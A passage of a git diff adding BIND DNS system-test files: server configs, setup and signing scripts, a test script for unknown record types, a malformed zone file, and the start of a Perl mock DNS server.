c4548cc51fdbd977523eea8d69a80d71 + 20790e59ffb6396a8a6db4878b4e3e3f + e2190159b50e2ef57028ec77360be8fd + 0325ce6af2a0a664fbbe8ec64b90774a + 61e259f753b053ecd2e3f9ce4f195cde + e748a7d56b7245a2ca7b7998fe7c9b36 + bde4dcbb616a77968455f11f042d6d9e + 5912638f53534af82568a6be645b37a5 + d00a0eef9723908344b2796e5260beac + 9187d5003aafc09a22faef40dd64c889 + 361d1869dfa590fd4a067e1b34c88130 + ccddf3feee45c4152be436091e3280d2 + df5bf218e1a19c6258999b0eab850674 + ec5ebad5eee1d93b691e7cefcd5194d5 + 534ba2ef91d9556219f5a08a07903b3f + 165707a987c13c4c673b28044d1c7664 + 7643c0d9ee4ea5a9ca661e783c3cd109 + 5e407171f4f71e40c14bcfba4fdd990a + 31b1109e242df74a20a895673a59f17e + 205d889af060ccf5850ad21ad777fe8e + 25db82f189cda7f4383085a35e95e4a9 + 7249da56d87b7f54757d785437207c54 + 69784ce2c5a4eaecf0cdb56af6a8952c + d3118436b794182b0acbe17a89a5b6b0 + cb7d0cb848cffe629fa3a6a55ffb9e88 + 22725f89ca7a868545eb6b5688137188 + 786d631d06ada4bb04ad456680cb6bd0 + 215e5bd9aa06cef9decf71bd1f4837de + 157a0e7ac0c46bd8c1d48fd75b48456b + 45eeee629c74debf39fbb251c578af9f + ac00c2a966398037df7c580eb3f8a00b + 46c4fdd3b28dc259de09199805e15f7c + 822677fcad0891ddf9a292d418f92feb + b18d5ef999caa77af84a47a5f4a3ee4b + 1065e627fd6a05453e0fb914e33118d3 + 4ca9b1e25d0182561db7a7c8f3b1c7dd + a03ce4342298629955c91095e6925e46 + 7c8567f4520fdbc986e64f62d7c154c6 + d3bd0444141f0ec5a872d6d7190e1171 + c476c80b2e3b9fade59c415201c284d7 + 3548c1f099f25a43fb4e14834c75d71a + ad5038c8c2448ecee85e535405374acc + ec5b2871276e064a73702de4916d7b78 + 4906af996757285cbb4aeecc25c94387 + 87342df987f16727069c72218c84e2c9 + a1ce2c5f2bb46e340aebb265ebefacfc + 1a99450e3474f8d2cc14a5617985cfc1 + c70aba028e347bd7be0c540367531026 + 3afd2ab8cc006feb487fd77ff73bf03b + 84e962d4e9e0c24f6efb6b045423f129 + e0525c54aa0663c34524008f3a2f06ba + 6dea62cc763523241fa5fd9390047327 + 327fbe08f8f2d0e89e1083bb44973ad5 + c05ac887da1f635111b0011376bccd21 + 7eeb2dc3bc569f735134502b9ed72086 + dfbbb91ee58a102f8568bf10110d447c + 5c68771385bb14a56b7865b1626dac4b + 8c60c17bf147a85759e4873fdc0256f6 + 564e160c9225caf60dc187ea2ae2d400 + 1c12015f714740421221c79c10e56cda + 4b98d7b721d15e545e78f663714ef95a + 021758aafa31c53e6ea9ab928acf55e3 + a0bf9b49d1f991e6ac876ddea607ac91 + b632eef4840c34ce7777a8b73883b686 + 4ab51d8c9a800187e9b12fbe393ef861 + 577e0be5ea12403ddd202a7d2e080ac6 + d24867636bc7106b01af7829306cbc3a + 636f83da0d5782f038d194e796a892b1 + b07519b4833e3fcc62188098bd7b3f9f + 797f1a716efa8208ab2a034cc2f247d9 + 57f17fcad307a3e907c6284b9ff894d1 + a960cf635605d78fe922bb989fcbf105 + c93cc5914d4348475a55c8410b1dd68b + 071983957fae7b23c8566de5de0c79f5 + 0bcb172430640355935e85451507f0ce + d1baf985be8e87efa7add72cec928e08 + 9a4a6ba917991fa540f4b68b66bd12f2 + 98ff9f15998747077e83cefaaed6e9ed + 08a334c80dbecedae9ad779163391f7a + ad751ba7b502de9a29f6390e1c05b829 + d707263fd876d1a5d6b8052fe5661049 + 143f6ccd6ba0868803c5d3f00b94d205 + fdbf1fb0e52b492eaa2dac0c14f891d4 + ca89d16caa89d7aa3355bb4e94cd8379 + c0be5e471cd95806e0b6d546b3816043 + d3b3808fac478b385afd3e3a74a50d38 + efa321fa284c43510ca8c10c8a846305 + ed11ab5a17c182054bba8adbfc2df6f1 + 7c519a48e51006bafac393eaf639ca16 + 3b250ef7df36acd69fc99ee7b1954e9d + 489c445f0c7393ccabbe4ed82cfe0173 + 54ff2f69c60c9c50de37bd436b9e4d04 + fc49096b00425741f9f9361f5a5c89d3 + 864ac5d3c8334689e8e317bdadd81be8 + 72f1a8ef614ae5745375e29ec1a0e2e2 + 8787ac2a2a1786ac320c66d5791bd00c + faef79198ee1b405f5eb918939c63fb4 + 59488827e29909959e573389ab21f4a0 + 2065a3bc0ecfa0032a298039dd0f21e1 + 951358ba8d655732fc940e1354b1c973 + 5d79dd788180ed99cc2238297a780267 + a5bf4db254b72f03ffdd87b1e1876b95 + 6c118194b207bf273fc6d99c8631d598 + fb39903cae7e90b617ed8cd9fb3c27d7 + 3fe5376340fe7c01218c2a15a5fa4d43 + 0f877e005d07c9bc69d162a7b0276f77 + 0db00f062adc72f329a82a5e6bb17049 + 9fdb50161ec4e8ceb8fb2a0320721db0 + d210a1f72cd1c6ad9fa8ffb5c8506680 + 8d7c88500b30eff0e05409de770839f6 + 28eb52aae627aa8e9a549ebb577c2bd9 + 0288769ca026b3790fd2048aa97fc32b + 5d14d528ea90ceb4518e54ed54985ca4 + 7804bf17337fece08b14f4be3456d745 + 46386d894aa471ea164cab9b3261d92e + 5ed63c61c106545ca8247f0fcb2b0128 + 4305dfe546edd070dbfef2cf4db93e50 + 8d8802db86557ae42fc48fdc914b4a0d + 9483b4880baeffc61c34a5d48322cfdf + cae7ac726dcf55724750d033517ad00c + e13d19a039418df8a23a05283336b598 + b84e7d131d9e51ecf00faca8398de34e + b8422f18f149fea650c07ff3e95d33c4 + 774936c56906003d8cb1ef7552a0b277 + 23a77eacb1f1a6d0e5b9ad3327be8e16 + 8faea2b438be2062bc182e74a6117e70 + 3e98d9aa2a0d771000a241b065d03a1e + 2630d557879928a7b68b8a287fadec4f + cf8ccd091dc034657e08ffcaba224d72 + 0b2929ea5a8a84966e4c4a2cb322f8a9 + d5378914c9400178ed00b79c4a53adf4 + fc5edfb66e6e61e1a3277a0d92914a16 + af328585f360216c6d3514d2efa1a710 + f68b442fa035ed78f57bb3949a4d159d + bbcbee5cc734b4f1f17e04e70674f192 + f079d5270f1f19b53ef2cfed9de81d6b + 7d1aa9f8e3ed8800b45ed4a3a110df60 + bf6d0c26891be05378f214def3fb68c9 + 37977a8e91dff2af6c33d5264514a940 + 1ed00d47d8b2173f7fe12be2433359e9 + c1e455b69405f84d397ce89ecf41598c + 34ec2d2c15326fca242f48edb6741e8a + 9aee351f449c05697b8005aeea6679cd + eef281ca22a32cea717a769af48ff7e3 + a46a9796b86c5c5ffd71449d42a46d89 + 0ab3696005c0132efdc24d97e6c78af5 + 50a3e0c475e8f4ecc69c9e8da9ba494a + 0eaddf1adaa5606287400772bb205ee5 + 216e812502993de510a88db1b12884bb + 83020dc5372097e1e9c323ad2ee0d811 + e4c6161e086f471d1cd0e5dad9657145 + c620f78edf98dc4edabaf82acdd472fb + 7251f17fc354c824882ac8529aee9183 + 6a80b89efd006d234f5cfa9e486317ca + 6433457937ec50b6c1efdf55b0776d29 + b8c36f7067ecea41d62b7e57d7c2c12f + eaff83380cb96423afa0ba51da333fee + df3969f7e6095893e99714d55409f266 + d85edda8a6677f319eed020f20ce41a0 + 3337d42a1c1fce7c26c951a6c8b12834 + 3375e3bf99969188e0aaa485749dd92f + e14ce8882b3b4cda3c7e7fbc08702407 + f057c9c2ae0ec540e553adc118d9afd5 + 1aef7303c3a128d01e432d292fb1510a + 29979e4028a7f02869397c73b571fa3f + 84a09a9cb70cc52c36cec79d3d533111 + 3594f1c842e75c87c0a79a745ad2b26f + 7b673cb57790b0b0734e399aa0a835f3 + ff711f45bff3cf6b97cdb74a5a1b53f9 + cdc0547f04c5076d20b178ab4d01465d + 9b96e23c28a269a4786fa7c33fffcfcd + ab07b8cd88e7aa3cb670d9301d535fb4 + 2ecf9b85b0d8a7431a2cb1237f2899af + 67e1cf09819e01e1cbb2edab0cd1ae2f + c6e07e7b194ee18f8821d144dccc49d0 + 550e6afe464fdc7ed36903ab42a2bfda + ee5faf95b909742e3f30d567d09b928a + 61e23b30970e8aef268fd27cc1a76bae + 51e95eba7a04cc574db34127f41f48ad + 0f60f3cb522de070b533c0b0060275e3 + 00d767b7f767c4aa3fa465dc24b84f2c + fd8ad4a61038d225ca4dc038201c8d09 + 4ea1b9443338a351d9bc43fa73059eb3 + c2c173a5647046441dc3ad6f71fe1a37 + e90095b6d1799e5d749e1953417477b0 + 70a2465efbed1a5267a9aa4ec2fd10b6 + 09039690fbcf9ea57e8758031bce78b8 + adf94c539753e35de5e8e300a527e7ec + 9c04e3b6e7e56f86f32400b25895c90a + d3e03ca49226548f6808a70081cd75d9 + 9bb561da5390f2d3418c4079311549f8 + 9e7e4e6539ac904756a7557de633c817 + 9df1b9b98c8ac5763c3854ee0743ef60 + 0bbb4f698fac7982b5944e81de5b8490 + 3de5d692e00a390291a4fd85e6080cee + 16b5ac1dc70348f4f037f7c3a87e003a + f3ecbb184ad9e8f0802e66748e3cbaa7 + 3d2864242278a7c12f5a741fa4a2bdd6 + 5302ddb14dc2f466ff960082e4281593 + 22115fdae1f8022cbb1f58df88cc724f + ce517512f87bcf4dd7eb1bd5dda30baa + e2cddfe95059f19680c51089f4effb3c + 6b8bc66cbb5b91574d352db346c260ba + 58bbd6c1ea29ebe4d03335b3e7b34b2d + a5ae1c69cebc4db7822752ac827af893 + 4c9eff227b72844626bb97adcfe1dd7a + 4407320c3d81c136759f5df02fb50719 + b5d7078f15cbd37d25a2f9c388e98ea4 + d33cda3977a886b97d607b2ff1d564e2 + b9d6a044b40fb5ebf0b46ed087287f9f + a0a9d4382c98965004011815efcc28ec + d159d68ad96932a35fdea0efe3ceb317 + cc537a55e7464b066a6fda767f872ea0 + 2c12ff8c89686236273ba562e4ec6fcf + 0e166190814dbc08dd30654a84db902f + cbfbda00c09bb4ef56a3a54139fb2306 + 18426675d6661866ef870e26daa0f275 + e5c680ea4b8aa5cc048d1f4c93ce3a28 + ed6d2b675336cb20a00ff06ad6cf40ed + 779b93e3bcb71227bfb374f58c96d69a + 874008d82295316ebd6394dafc393922 + de1719dae26a1a309cc4206535c88a55 + da7c4a0f7cfa29a9d0f21bb9dc4d8448 + fcb5d807d37002769fd786525fc5f365 + e2ec2dacea3287f0d203b3df87a3cb09 + 562fcb8b45bb6ac955ff94c4b72f3b18 + f0df78648b5a339a0bccbeb35d8e5bd9 + cf58d1d77e957790f18e2bf6018e3208 + 0bca6bd34efec9760518c9e65416dbd9 + ec0e7d9f242892fc45b66e862298fbab + 0d1855b762d1c505072d06fab0fa99cc + 518d8830e6fa0aef5977e116606874df + ef1756ed555798daaa3fe8078a19e892 + b94db166ba6a99c63c79f1f62af6a319 + 601cc304ca52a8883ecfc3647c069b83 + 2169d91bce1145995b514ca73d70edc3 + 4a3887e5217279251946241447b7aac9 + 5dde21faf82ac2c044b0013e7577877a + 8ed5320f8e874058d96eaac621566a09 + 94d762ea58c9a3a9029645273d27af53 + 8215b3cf672fab49838d87caab2a91c9 + b80e8e80306f73143a00d6af61037d19 + 6e593d585892835bf6b87ece1ef5d439 + 780beb20cb674f5b885cc368ebaff8d4 + ba43bca4962a09d6dcb771baef7e3df9 ) diff --git a/bin/tests/system/unknown/ns1/named.conf.in b/bin/tests/system/unknown/ns1/named.conf.in new file mode 100644 index 0000000..a240cbe --- /dev/null +++ b/bin/tests/system/unknown/ns1/named.conf.in @@ -0,0 +1,68 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.1; + notify-source 10.53.0.1; + transfer-source 10.53.0.1; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { none; }; + recursion no; + notify no; +}; + +view "in" { + zone "example." { + type primary; + file "example-in.db"; + }; + + zone "broken1." { + type primary; + file "broken1.db"; + }; + + zone "broken2." { + type primary; + file "broken2.db"; + }; + + zone "broken3." { + type primary; + file "broken3.db"; + }; + + zone "broken4." { + type primary; + file "broken4.db"; + }; + + zone "broken5." { + type primary; + file "broken5.db"; + }; +}; + +view "class10" class10 { + zone "." class10 { + type hint; + file "class10.hints"; + }; + + zone "example." class10 { + type primary; + file "example-class10.db"; + }; +}; diff --git a/bin/tests/system/unknown/ns2/named.conf.in b/bin/tests/system/unknown/ns2/named.conf.in new file mode 100644 index 0000000..01361c7 --- /dev/null +++ b/bin/tests/system/unknown/ns2/named.conf.in @@ -0,0 +1,32 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.2; + notify-source 10.53.0.2; + transfer-source 10.53.0.2; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + recursion no; + notify no; +}; + +view "in" { + zone "example." { + type secondary; + primaries { 10.53.0.1; }; + file "example-in.bk"; + }; +}; diff --git a/bin/tests/system/unknown/ns3/named.conf.in b/bin/tests/system/unknown/ns3/named.conf.in new file mode 100644 index 0000000..828d667 --- /dev/null +++ b/bin/tests/system/unknown/ns3/named.conf.in @@ -0,0 +1,34 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.3; + notify-source 10.53.0.3; + transfer-source 10.53.0.3; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.3; }; + listen-on-v6 { none; }; + recursion no; + notify no; +}; + +view "in" { + zone "example." { + type secondary; + primaries { 10.53.0.1; }; + inline-signing yes; + auto-dnssec maintain; + file "example-in.bk"; + }; +}; diff --git a/bin/tests/system/unknown/ns3/sign.sh b/bin/tests/system/unknown/ns3/sign.sh new file mode 100644 index 0000000..76063a7 --- /dev/null +++ b/bin/tests/system/unknown/ns3/sign.sh @@ -0,0 +1,21 @@ +#!/bin/sh -e + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=../.. +. $SYSTEMTESTTOP/conf.sh + +zone=example +rm -f K${zone}.+*+*.key +rm -f K${zone}.+*+*.private +keyname=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -n zone $zone) +keyname=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -n zone -f KSK $zone) diff --git a/bin/tests/system/unknown/setup.sh b/bin/tests/system/unknown/setup.sh new file mode 100644 index 0000000..9b65d05 --- /dev/null +++ b/bin/tests/system/unknown/setup.sh @@ -0,0 +1,21 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +copy_setports ns1/named.conf.in ns1/named.conf +copy_setports ns2/named.conf.in ns2/named.conf +copy_setports ns3/named.conf.in ns3/named.conf + +(cd ns3; $SHELL -e sign.sh) diff --git a/bin/tests/system/unknown/tests.sh b/bin/tests/system/unknown/tests.sh new file mode 100644 index 0000000..e324fae --- /dev/null +++ b/bin/tests/system/unknown/tests.sh @@ -0,0 +1,229 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +status=0 +n=0 + +DIGOPTS="-p ${PORT}" + +n=$((n+1)) +echo_i "querying for various representations of an IN A record ($n)" +for i in 1 2 3 4 5 6 7 8 9 10 11 12 +do + ret=0 + $DIG +short $DIGOPTS @10.53.0.1 a$i.example a in > dig.out.$i.test$n || ret=1 + echo 10.0.0.1 | $DIFF - dig.out.$i.test$n || ret=1 + if [ $ret != 0 ] + then + echo_i "#$i failed" + fi + status=`expr $status + $ret` +done + +n=$((n+1)) +echo_i "querying for various representations of an IN TXT record ($n)" +for i in 1 2 3 4 5 6 7 +do + ret=0 + $DIG +short $DIGOPTS @10.53.0.1 txt$i.example txt in > dig.out.$i.test$n || ret=1 + echo '"hello"' | $DIFF - dig.out.$i.test$n || ret=1 + if [ $ret != 0 ] + then + echo_i "#$i failed" + fi + status=`expr $status + $ret` +done + +n=$((n+1)) +echo_i "querying for various representations of an IN TYPE123 record ($n)" +for i in 1 2 3 +do + ret=0 + $DIG +short $DIGOPTS @10.53.0.1 unk$i.example type123 in > dig.out.$i.test$n || ret=1 + echo '\# 1 00' | $DIFF - dig.out.$i.test$n || ret=1 + if [ $ret != 0 ] + then + echo_i "#$i failed" + fi + status=`expr $status + $ret` +done + +n=$((n+1)) +echo_i "querying for NULL record ($n)" +ret=0 +$DIG +short $DIGOPTS @10.53.0.1 null.example null in > dig.out.test$n || ret=1 +echo '\# 1 00' | $DIFF - dig.out.test$n || ret=1 +[ $ret = 0 ] || echo_i "failed" +status=`expr $status + $ret` + +n=$((n+1)) +echo_i "querying for empty NULL record ($n)" +ret=0 +$DIG +short $DIGOPTS @10.53.0.1 empty.example null in > dig.out.test$n || ret=1 +echo '\# 0' | $DIFF - dig.out.test$n || ret=1 +[ $ret = 0 ] || echo_i "failed" +status=`expr $status + $ret` + +n=$((n+1)) +echo_i "querying for various representations of a CLASS10 TYPE1 record ($n)" +for i in 1 2 +do + ret=0 + $DIG +short $DIGOPTS @10.53.0.1 a$i.example a class10 > dig.out.$i.test$n || ret=1 + echo '\# 4 0A000001' | $DIFF - dig.out.$i.test$n || ret=1 + if [ $ret != 0 ] + then + echo_i "#$i failed" + fi + status=`expr $status + $ret` +done + +n=$((n+1)) +echo_i "querying for various representations of a CLASS10 TXT record ($n)" +for i in 1 2 3 4 +do + ret=0 + $DIG +short $DIGOPTS @10.53.0.1 txt$i.example txt class10 > dig.out.$i.test$n || ret=1 + echo '"hello"' | $DIFF - dig.out.$i.test$n || ret=1 + if [ $ret != 0 ] + then + echo_i "#$i failed" + fi + status=`expr $status + $ret` +done + +n=$((n+1)) +echo_i "querying for various representations of a CLASS10 TYPE123 record ($n)" +for i in 1 2 +do + ret=0 + $DIG +short $DIGOPTS @10.53.0.1 unk$i.example type123 class10 > dig.out.$i.test$n || ret=1 + echo '\# 1 00' | $DIFF - dig.out.$i.test$n || ret=1 + if [ $ret != 0 ] + then + echo_i "#$i failed" + fi + status=`expr $status + $ret` +done + +n=$((n+1)) +echo_i "querying for SOAs of zone that should have failed to load ($n)" +for i in 1 2 3 4 +do + ret=0 + $DIG $DIGOPTS @10.53.0.1 broken$i. soa in > dig.out.$i.test$n || ret=1 + grep "SERVFAIL" dig.out.$i.test$n > /dev/null || ret=1 + if [ $ret != 0 ] + then + echo_i "#$i failed" + fi + status=`expr $status + $ret` +done + +n=$((n+1)) +echo_i "checking large unknown record loading on primary ($n)" +for try in 0 1 2 3 4 5 6 7 8 9; do + ret=0 + $DIG $DIGOPTS @10.53.0.1 +tcp +short large.example TYPE45234 > dig.out.$i.test$n || { ret=1 ; echo_i "dig failed" ; } + $DIFF -s large.out dig.out.$i.test$n > /dev/null || { ret=1 ; echo_i "$DIFF failed"; } + [ "$ret" -eq 0 ] && break + sleep 1 +done +[ $ret = 0 ] || echo_i "failed" +status=`expr $status + $ret` + +n=$((n+1)) +echo_i "checking large unknown record loading on secondary ($n)" +for try in 0 1 2 3 4 5 6 7 8 9; do + ret=0 + $DIG $DIGOPTS @10.53.0.2 +tcp +short large.example TYPE45234 > dig.out.$i.test$n || { ret=1 ; echo_i "dig failed" ; } + $DIFF -s large.out dig.out.$i.test$n > /dev/null || { ret=1 ; echo_i "$DIFF failed"; } + [ "$ret" -eq 0 ] && break + sleep 1 +done +[ $ret = 0 ] || echo_i "failed" +status=`expr $status + $ret` + +echo_i "stop and restart secondary" +stop_server ns2 +start_server --noclean --restart --port ${PORT} ns2 + +# server may be answering queries before zones are loaded, +# so retry a few times if this query fails +n=$((n+1)) +echo_i "checking large unknown record loading on secondary ($n)" +for try in 0 1 2 3 4 5 6 7 8 9; do + ret=0 + $DIG $DIGOPTS @10.53.0.2 +tcp +short large.example TYPE45234 > dig.out.$i.test$n || { ret=1 ; echo_i "dig failed" ; } + $DIFF -s large.out dig.out.$i.test$n > /dev/null || { ret=1 ; echo_i "$DIFF failed"; } + [ "$ret" -eq 0 ] && break + sleep 1 +done +[ $ret = 0 ] || echo_i "failed" +status=`expr $status + $ret` + +n=$((n+1)) +echo_i "checking large unknown record loading on inline secondary ($n)" +ret=0 +$DIG $DIGOPTS @10.53.0.3 +tcp +short large.example TYPE45234 > dig.out.test$n || { ret=1 ; echo_i "dig failed" ; } +$DIFF large.out dig.out.test$n > /dev/null || { ret=1 ; echo_i "$DIFF failed"; } +[ $ret = 0 ] || echo_i "failed" +status=`expr $status + $ret` + +echo_i "stop and restart inline secondary" +stop_server ns3 +start_server --noclean --restart --port ${PORT} ns3 + +# server may be answering queries before zones are loaded, +# so retry a few times if this query fails +n=$((n+1)) +echo_i "checking large unknown record loading on inline secondary ($n)" +for try in 0 1 2 3 4 5 6 7 8 9; do + ret=0 + $DIG $DIGOPTS @10.53.0.3 +tcp +short large.example TYPE45234 > dig.out.$i.test$n || { ret=1 ; echo_i "dig failed" ; } + $DIFF large.out dig.out.$i.test$n > /dev/null || { ret=1 ; echo_i "$DIFF failed"; } + [ "$ret" -eq 0 ] && break + sleep 1 +done +[ $ret = 0 ] || echo_i "failed" +status=`expr $status + $ret` + +n=$((n+1)) +echo_i "check that '"'"\\#"'"' is not treated as the unknown escape sequence ($n)" +ret=0 +$DIG $DIGOPTS @10.53.0.1 +tcp +short txt8.example txt > dig.out.test$n +echo '"#" "2" "0145"' | $DIFF - dig.out.test$n || ret=1 +[ $ret = 0 ] || echo_i "failed" +status=`expr $status + $ret` + +n=$((n+1)) +echo_i "check that 'TXT \# text' is not treated as the unknown escape sequence ($n)" +ret=0 +$DIG $DIGOPTS @10.53.0.1 +tcp +short txt9.example txt > dig.out.test$n +echo '"#" "text"' | $DIFF - dig.out.test$n || ret=1 +[ $ret = 0 ] || echo_i "failed" +status=`expr $status + $ret` + +n=$((n+1)) +echo_i "check that 'TYPE353 \# cat' produces 'not a valid number' ($n)" +ret=0 +$CHECKZONE nan.bad zones/nan.bad > check.out 2>&1 +grep "not a valid number" check.out > /dev/null || ret=1 +[ $ret = 0 ] || echo_i "failed" +status=`expr $status + $ret` + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/unknown/zones/nan.bad b/bin/tests/system/unknown/zones/nan.bad new file mode 100644 index 0000000..4381f88 --- /dev/null +++ b/bin/tests/system/unknown/zones/nan.bad @@ -0,0 +1,12 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +@ 0 IN TYPE353 \# cat 010101010101010101 diff --git a/bin/tests/system/upforwd/ans4/ans.pl b/bin/tests/system/upforwd/ans4/ans.pl new file mode 100644 index 0000000..75ab3ed --- /dev/null +++ b/bin/tests/system/upforwd/ans4/ans.pl @@ -0,0 +1,363 @@ +#!/usr/bin/perl + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# +# This is the name server from hell. It provides canned +# responses based on pattern matching the queries, and +# can be reprogrammed on-the-fly over a TCP connection. +# +# The server listens for control connections on port 5301. +# A control connection is a TCP stream of lines like +# +# /pattern/ +# name ttl type rdata +# name ttl type rdata +# ... +# /pattern/ +# name ttl type rdata +# name ttl type rdata +# ... +# +# There can be any number of patterns, each associated +# with any number of response RRs. Each pattern is a +# Perl regular expression. +# +# Each incoming query is converted into a string of the form +# "qname qtype" (the printable query domain name, space, +# printable query type) and matched against each pattern. +# +# The first pattern matching the query is selected, and +# the RR following the pattern line are sent in the +# answer section of the response. +# +# Each new control connection causes the current set of +# patterns and responses to be cleared before adding new +# ones. +# +# The server handles UDP and TCP queries. Zone transfer +# responses work, but must fit in a single 64 k message. +# +# Now you can add TSIG, just specify key/key data with: +# +# /pattern <key> <key_data>/ +# name ttl type rdata +# name ttl type rdata +# +# Note that this data will still be sent with any request for +# pattern, only this data will be signed. Currently, this is only +# done for TCP. + + +use IO::File; +use IO::Socket; +use Data::Dumper; +use Net::DNS; +use Net::DNS::Packet; +use strict; + +# Ignore SIGPIPE so we won't fail if peer closes a TCP socket early +local $SIG{PIPE} = 'IGNORE'; + +# Flush logged output after every line +local $| = 1; + +my $server_addr = "10.53.0.4"; + +my $localport = int($ENV{'PORT'}); +if (!$localport) { $localport = 5300; } + +my $udpsock = IO::Socket::INET->new(LocalAddr => "$server_addr", + LocalPort => $localport, Proto => "udp", Reuse => 1) or die "$!"; + +my $tcpsock = IO::Socket::INET->new(LocalAddr => "$server_addr", + LocalPort => $localport, Proto => "tcp", Listen => 5, Reuse => 1) or die "$!"; + +print "listening on $server_addr:$localport.\n"; + +my $pidf = new IO::File "ans.pid", "w" or die "cannot open pid file: $!"; +print $pidf "$$\n" or die "cannot write pid file: $!"; +$pidf->close or die "cannot close pid file: $!";; +sub rmpid { unlink "ans.pid"; exit 1; }; + +$SIG{INT} = \&rmpid; +$SIG{TERM} = \&rmpid; + +#my @answers = (); +my @rules; +sub handleUDP { + my ($buf) = @_; + my $packet; + + if ($Net::DNS::VERSION > 0.68) { + $packet = new Net::DNS::Packet(\$buf, 0); + $@ and die $@; + } else { + my $err; + ($packet, $err) = new Net::DNS::Packet(\$buf, 0); + $err and die $err; + } + + $packet->header->qr(1); + $packet->header->aa(1); + + my @questions = $packet->question; + my $qname = $questions[0]->qname; + my $qtype = $questions[0]->qtype; + + # get the existing signature if any, and clear the additional section + my $prev_tsig; + while (my $rr = $packet->pop("additional")) { + if ($rr->type eq "TSIG") { + $prev_tsig = $rr; + } + } + + my $r; + foreach $r (@rules) { + my $pattern = $r->{pattern}; + my($dbtype, $key_name, $key_data) = split(/ /,$pattern); + print "[handleUDP] $dbtype, $key_name, $key_data \n"; + if ("$qname $qtype" =~ /$dbtype/) { + my $a; + foreach $a (@{$r->{answer}}) { + $packet->push("answer", $a); + } + if(defined($key_name) && defined($key_data)) { + # Sign the packet + print " Signing the response with " . + "$key_name/$key_data\n"; + my $tsig = Net::DNS::RR-> + new("$key_name TSIG $key_data"); + + # These kluges are necessary because Net::DNS + # doesn't know how to sign responses. We + # clear compnames so that the TSIG key and + # algorithm name won't be compressed, and + # add one to arcount because the signing + # function will attempt to decrement it, + # which is incorrect in a response. Finally + # we set request_mac to the previous digest. + $packet->{"compnames"} = {}; + $packet->{"header"}{"arcount"} += 1; + if (defined($prev_tsig)) { + my $rmac = pack('n H*', + $prev_tsig->mac_size, + $prev_tsig->mac); + $tsig->{"request_mac"} = + unpack("H*", $rmac); + } + + $packet->sign_tsig($tsig); + } + last; + } + } + #$packet->print; + + return $packet->data; +} + +# namelen: +# given a stream of data, reads a DNS-formatted name and returns its +# total length, thus making it possible to skip past it. +sub namelen { + my ($data) = @_; + my $len = 0; + my $label_len = 0; + do { + $label_len = unpack("c", $data); + $data = substr($data, $label_len + 1); + $len += $label_len + 1; + } while ($label_len != 0); + return ($len); +} + +# packetlen: +# given a stream of data, reads a DNS wire-format packet and returns +# its total length, making it possible to skip past it. +sub packetlen { + my ($data) = @_; + my $q; + my $rr; + + my ($header, $offset) = Net::DNS::Header->parse(\$data); + for (1 .. $header->qdcount) { + ($q, $offset) = Net::DNS::Question->parse(\$data, $offset); + } + for (1 .. $header->ancount) { + ($rr, $offset) = Net::DNS::RR->parse(\$data, $offset); + } + for (1 .. $header->nscount) { + ($rr, $offset) = Net::DNS::RR->parse(\$data, $offset); + } + for (1 .. $header->arcount) { + ($rr, $offset) = Net::DNS::RR->parse(\$data, $offset); + } + return $offset; +} + +# sign_tcp_continuation: +# This is a hack to correct the problem that Net::DNS has no 